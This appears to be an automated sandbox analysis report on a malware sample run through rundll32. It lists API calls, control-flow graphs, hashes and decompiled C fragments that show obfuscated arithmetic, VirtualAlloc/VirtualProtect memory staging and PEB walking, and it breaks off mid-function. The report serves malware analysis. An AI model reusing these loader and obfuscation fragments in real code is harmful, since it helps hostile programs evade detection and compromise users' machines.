                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 93bc48649f92dfcf26019eda0e3dd7e14f12c4e7a20aef5dacdd6f668383b569
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 80C1BA75A00209DFDB48CF98C590EAEB7B6FF88304F148559E909AB395D735EA42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0200E6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.2103524497.0000000001FF0000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 9e09dd9492fedc1b47c7ba33d58183c8f095eaf9715e47c36af46791fee0c01b
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 10113D60D08389EAFF01D7E8D449BFEBFB55B11704F044498D5847A282D2BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage:2.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:942
                                                                      Total number of Limit Nodes:1

                                                                      Graph

4244 1f6fc5 4243->4244 4245 1e68ec GetPEB 4244->4245 4246 1f7053 4245->4246 4246->4236 4247 1f2179 4251 1f242a 4247->4251 4248 1eb340 GetPEB 4248->4251 4249 1f24e6 4250 1e5370 GetPEB 4250->4251 4251->4248 4251->4249 4251->4250 4252 1e9a4b GetPEB 4251->4252 4253 1f02e1 GetPEB 4251->4253 4252->4251 4253->4251 4563 1e27f3 4564 1e2809 4563->4564 4565 1e68ec GetPEB 4564->4565 4566 1e289c 4565->4566 4272 1e8f63 4273 1e902d 4272->4273 4274 1e9006 4272->4274 4278 1f9665 4274->4278 4277 1efa3b GetPEB 4277->4273 4290 1f9bf5 4278->4290 4279 1e3c8e GetPEB 4279->4290 4280 1ed54c GetPEB 4280->4290 4281 1e4cc9 GetPEB 4281->4290 4283 1f9df7 4286 1e598b GetPEB 4283->4286 4284 1e74bf GetPEB 4284->4290 4285 1e5370 GetPEB 4285->4290 4287 1e9019 4286->4287 4287->4273 4287->4277 4288 1f02e1 GetPEB 4288->4290 4289 1e9a4b GetPEB 4289->4290 4290->4279 4290->4280 4290->4281 4290->4283 4290->4284 4290->4285 4290->4287 4290->4288 4290->4289 4291 1f0339 4290->4291 4292 1e68ec GetPEB 4291->4292 4293 1f03d6 4292->4293 4293->4290

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001FEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001FEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2103316012.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_1e0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 97a10145540773341ebc5178c26d946eefb5364c4a7d306cd2560212974939de
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: B2C189B5A00209DFCB48CF98C590EAEB7B6BF88314F148159E919AB355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 41 1fe620-1fe66b call 1fea10 44 1fe66d-1fe677 call 1fea10 41->44 45 1fe67a-1fe6aa call 1fe390 VirtualAlloc 41->45 44->45
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001FE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2103316012.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_1e0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 061bc175958b1e3d891ac607f0d4a7bad2d014892118e11b02f0dbb87003a93f
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 1B110D60D0828DEAEF01D7E89409BFEBFB55B21704F044098E6456B282D7BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 463928-4639b4 call 4479dc 5 4639b6 0->5 6 4639bd-4639cf GetEnhMetaFileA 0->6 5->6 8 4639d1 6->8 9 4639d8-4639ec 6->9 8->9 10 463a0e-463ac5 VirtualAlloc 9->10 11 4639ee-463a0c 9->11 19 463acf-463ada 10->19 11->10 20 463b21-463b33 19->20 21 463adc-463b1f 19->21 22 463b75-463bac 20->22 23 463b35-463b73 20->23 21->19 23->22 23->23
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|lF
                                                                      • API String ID: 2643768156-462011533
                                                                      • Opcode ID: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction ID: 00c49ef07d34f105fcf4d433495aa085861750dc82918067735be55c91b233ef
                                                                      • Opcode Fuzzy Hash: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction Fuzzy Hash: 8561B5B0601A409FE740DF69ED86A0537A5F704309B12853AE589972B1FFF5A854CF4F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 25 461638-461641 26 461643 25->26 27 46164b-4616d1 DdeInitializeA call 461328 call 461a14 25->27 26->27 37 4616d6-4616eb 27->37
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction ID: d0869bd9eca08793bd1e582bf0eae279adb1ed532342e6143eed6f974ddeb4d0
                                                                      • Opcode Fuzzy Hash: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction Fuzzy Hash: F21194706007006FD710EF76CD82B4E77E9AF45744B54583AF800E76A1FA79A901875E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 2feb40-2feb93 VirtualProtect 40 2feba6-2fec17 39->40 41 2feb95-2feba1 39->41 42 2fec3a-2fec85 call 2fe7a0 call 2fe7e0 40->42 57 2fec19-2fec37 40->57 41->42 50 2fec90-2fec9a 42->50 51 2fec9c-2feca3 50->51 52 2fecf8-2fed4a call 2fe920 50->52 55 2feced-2fecf6 51->55 56 2feca5-2fecac 51->56 62 2fed4c-2fed50 52->62 63 2fed78-2fed7f 52->63 55->50 56->55 60 2fecae-2fecea call 2fe7e0 56->60 57->42 60->55 62->63 66 2fed52-2fed75 call 2fe880 62->66 67 2fed8a-2fed94 63->67 66->63 69 2fede6-2fee1b call 2ff000 67->69 70 2fed96-2fed9d 67->70 73 2fed9f-2feda6 70->73 74 2feddb-2fede4 70->74 73->74 77 2feda8-2fedd9 call 2fee20 VirtualProtect 73->77 74->67 77->74
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 002FEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 002FEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106019058.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_2e0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: c15a5fceb163e9ff0d3deff042fdae5984c05372b6d4a83c8e461d7c6327cd43
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: F7C1D9B4A10209DFCB48CF88C590EAEB7B6BF88344F158159E919AB351D735EE52CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 80 461a14-461a5a call 461ac8 86 461a70-461aa7 DdeCreateStringHandleA DdeNameService 80->86 87 461a5c-461a69 80->87 90 461aaf 86->90 87->86
                                                                      APIs
                                                                        • Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction ID: 9d8230b8b9786ad70cb23cfc8f07923e913d2bc7bc66b4dc0d7f0c12b5e74525
                                                                      • Opcode Fuzzy Hash: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction Fuzzy Hash: 5E1182717112545BCB11EAA5C882A4A37ACAF89B04B5405BAFD00EB296E678ED008799
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 91 2fe620-2fe66b call 2fea10 94 2fe66d-2fe677 call 2fea10 91->94 95 2fe67a-2fe6aa call 2fe390 VirtualAlloc 91->95 94->95
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 002FE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106019058.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_2e0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 6de6407db7ce28ffbb80852cbaa6ebc35b9d05900c275f0f9ea428be5ecc57f4
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 77111260D082CDDEEF01DBE894097FFBFB55F21704F044098D6456B282D6BA57588BB6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00428361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004283A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction ID: 637bc979103a918286e5382f01602372abea4ab8c4984eea237f75ea849c2a86
                                                                      • Opcode Fuzzy Hash: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction Fuzzy Hash: AE11DF717023249FD320CF20AC44BABB7E8EB45B11F41453EED46D7240EBF5A8048BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction ID: 560c2e5531f95041473ab5abdf9a332d975f3a18d6c562c3f42fe07e166bb06b
                                                                      • Opcode Fuzzy Hash: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction Fuzzy Hash: 413150B2A02219AFDB00DFA5DC44AEF77BCAF55304F41452BF911E3240EB78D9148BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0042847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction ID: 605c18e4e1bdf3c56052bce9c4db53a3c74fed138b051222b05aff1404ffe72f
                                                                      • Opcode Fuzzy Hash: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction Fuzzy Hash: 0C11E4717023255FD720EF60AC44BABB7E8EB05320F41453EED459B240EBB4B84487AA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction ID: 99280014b4e7568ae5b78b7f4e1cfa4d9ca9bf2b7dd90ccdf1763cf76fa4773a
                                                                      • Opcode Fuzzy Hash: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction Fuzzy Hash: 6C11D671B02314AFD720DF65AC44BABB7E8EB05310F45493FED45D7240EBB5A8848BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004282E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004282F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction ID: f632a035e8c56aece19070c7510d802e9804e06d05fa250d5db15c947f9699d3
                                                                      • Opcode Fuzzy Hash: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction Fuzzy Hash: 4101A231302328AFDB009F51EC44B9E7B55EB40B54F85403EFD048B251DBB6AC058BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004281C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004281CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction ID: 7300420cbd37d90105d4b3cf7da4562c34fb93397a177b564f82ba5817a4c9b0
                                                                      • Opcode Fuzzy Hash: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction Fuzzy Hash: DB01A2313022249BD7109B14ED85B2BB794E741395F85806FEC04CB283DBB9EC528BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 00462BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction ID: b5047ada5e6505b9d9b610dba3069aac40fc24b3776deae8b4cf26fcfcd54791
                                                                      • Opcode Fuzzy Hash: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction Fuzzy Hash: A3214A742046409FDB40DF59C9C1E5A77E8EB49310F158196F988CF2A6E779EC40CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0F$`
                                                                      • API String ID: 701148680-3237207667
                                                                      • Opcode ID: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction ID: db70940b4a1f0617aeeac80f8a0c91bf787b1828615b15b28606ddd46ecba5aa
                                                                      • Opcode Fuzzy Hash: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction Fuzzy Hash: 13518476B006199BCB00DE5DD9854AF73B9AB48354F1D4026FD06D7360EA38DD02C7AB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00428110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction ID: 0ee67d0bb69f832fec1fca06a4eed47d1578d3d3e795e0a9096b3779754e9213
                                                                      • Opcode Fuzzy Hash: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction Fuzzy Hash: 4AF0F0303072204ADB105F38BE8163E7546A782374FE08A3FE126466D2DE7C8823824E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 472 3c3928-3c39b4 call 3a79dc 477 3c39bd-3c39cf GetEnhMetaFileA 472->477 478 3c39b6 472->478 480 3c39d8-3c39ec 477->480 481 3c39d1 477->481 478->477 482 3c3a0e-3c3ac5 VirtualAlloc 480->482 483 3c39ee-3c3a0c 480->483 481->480 491 3c3acf-3c3ada 482->491 483->482 492 3c3adc-3c3b1f 491->492 493 3c3b21-3c3b33 491->493 492->491 494 3c3b75-3c3bac 493->494 495 3c3b35-3c3b73 493->495 495->494 495->495
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 003C39C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,003C6CB4,00001000,00000040), ref: 003C3A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|l<
                                                                      • API String ID: 2643768156-2874746031
                                                                      • Opcode ID: 81bb05bb29205ec379e1e0c0c5b6faacce6aab5161c9a8a0cf877b5e6c9dfe2d
                                                                      • Instruction ID: 60b3fa6b299525f7252d46074e9417a53ec18f63da30256bd9ee62ba3ac8e997
                                                                      • Opcode Fuzzy Hash: 81bb05bb29205ec379e1e0c0c5b6faacce6aab5161c9a8a0cf877b5e6c9dfe2d
                                                                      • Instruction Fuzzy Hash: 56618575645200AFD743DF68ED87E1A37AAFB48744F00C029E089CB266DF7AB8848B44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 497 3704c7-370565 call 367378 ExitProcess
                                                                      C-Code - Quality: 100%
                                                                      			E003704C7() {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _t48;
                                                                      				signed int _t49;
                                                                      
                                                                      				_v8 = 0xb3b9;
                                                                      				_v8 = _v8 + 0x1dd8;
                                                                      				_v8 = _v8 >> 0xa;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 ^ 0x000002ef;
                                                                      				_v20 = 0x5082;
                                                                      				_t48 = 0xc;
                                                                      				_v20 = _v20 / _t48;
                                                                      				_v20 = _v20 ^ 0x00006c35;
                                                                      				_v12 = 0x710;
                                                                      				_v12 = _v12 >> 3;
                                                                      				_t49 = 0x6d;
                                                                      				_v12 = _v12 / _t49;
                                                                      				_v12 = _v12 ^ 0x0000532a;
                                                                      				_v16 = 0x5a4c;
                                                                      				_v16 = _v16 ^ 0xca4a1f4d;
                                                                      				_v16 = _v16 ^ 0xca4a24cd;
                                                                      				E00367378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
                                                                      				ExitProcess(0);
                                                                      			}










                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 00370560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: *S$5l$LZ
                                                                      • API String ID: 621844428-1939029103
                                                                      • Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction ID: d15061843e7682043cd7b43bb496ac766729cea4b04f9e74b1b9d247793e49f1
                                                                      • Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction Fuzzy Hash: 7911F771E0520CEBEB04DFE4D84AADEBBB1EB50714F10C189E414AB284D7F96B548F81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 526 369b5e-369c3f call 372550 call 367378 RtlAllocateHeap
                                                                      C-Code - Quality: 72%
                                                                      			E00369B5E(void* __ecx, long __edx, long _a4, void* _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _v32;
                                                                      				intOrPtr _v36;
                                                                      				void* _t52;
                                                                      				void* _t68;
                                                                      				signed int _t70;
                                                                      				signed int _t71;
                                                                      				signed int _t72;
                                                                      				long _t81;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t81 = __edx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				E00372550(_t52);
                                                                      				_v36 = 0x84647;
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_t70 = 0x14;
                                                                      				asm("stosd");
                                                                      				_v20 = 0xbd42;
                                                                      				_t71 = 0x62;
                                                                      				_v20 = _v20 / _t70;
                                                                      				_v20 = _v20 ^ 0x00000265;
                                                                      				_v16 = 0x7dd6;
                                                                      				_v16 = _v16 / _t71;
                                                                      				_v16 = _v16 ^ 0x742f5ff0;
                                                                      				_v16 = _v16 ^ 0x742f2524;
